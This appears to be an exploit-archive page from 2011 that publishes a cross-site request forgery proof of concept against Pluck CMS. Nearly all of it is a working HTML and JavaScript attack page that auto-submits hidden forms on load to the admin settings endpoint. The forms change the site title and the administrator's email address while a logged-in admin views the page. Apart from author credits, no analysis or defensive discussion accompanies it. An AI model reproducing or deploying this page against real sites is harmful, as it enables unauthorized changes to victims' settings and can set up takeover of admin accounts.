Home / exploits Pluck CMS Cross Site Request Forgery
Posted on 22 April 2011
#(+)Exploit Title: Pluck CMS Cross Site Request Forgery Exploit #(+)Author : ^Xecuti0n3r #(+) Date : 22.04.2011 #(+) Hour : 13:37 PM #(+) E-mail : xecuti0n3r()yahoo.com #(+)download: http://www.pluck-cms.org/?file=kop2.php #(+) Category : Web Apps [XSRF] <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Pluck CMS Cross Site Request Forgery Exploit</title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> var pauses = new Array( "829","328" ); function pausecomp(millis) { var date = new Date(); var curDate = null; do { curDate = new Date(); } while(curDate-date < millis); } function fireForms() { var count = 2; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); pausecomp(pauses[i]); } } </script> <H2>Pluck CMS Cross Site Request Forgery Exploit to trick the Admin to Change the Page Title</H2> <form method="POST" name="form0" action="http://site:80/<put_pluck_id_here>/admin.php?action=settings&s=4f08df0b7b639e6bc8cd92460944644c"> <input type="hidden" name="title" value="Victims New Title That attacker Set"/> <input type="hidden" name="email" value="theemailichange@newemail.com"/> <input type="hidden" name="Submit" value="Save"/> </form> </body> </html> ######################################################################## (+)Exploit Coded by: ^Xecuti0n3r (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r ########################################################################
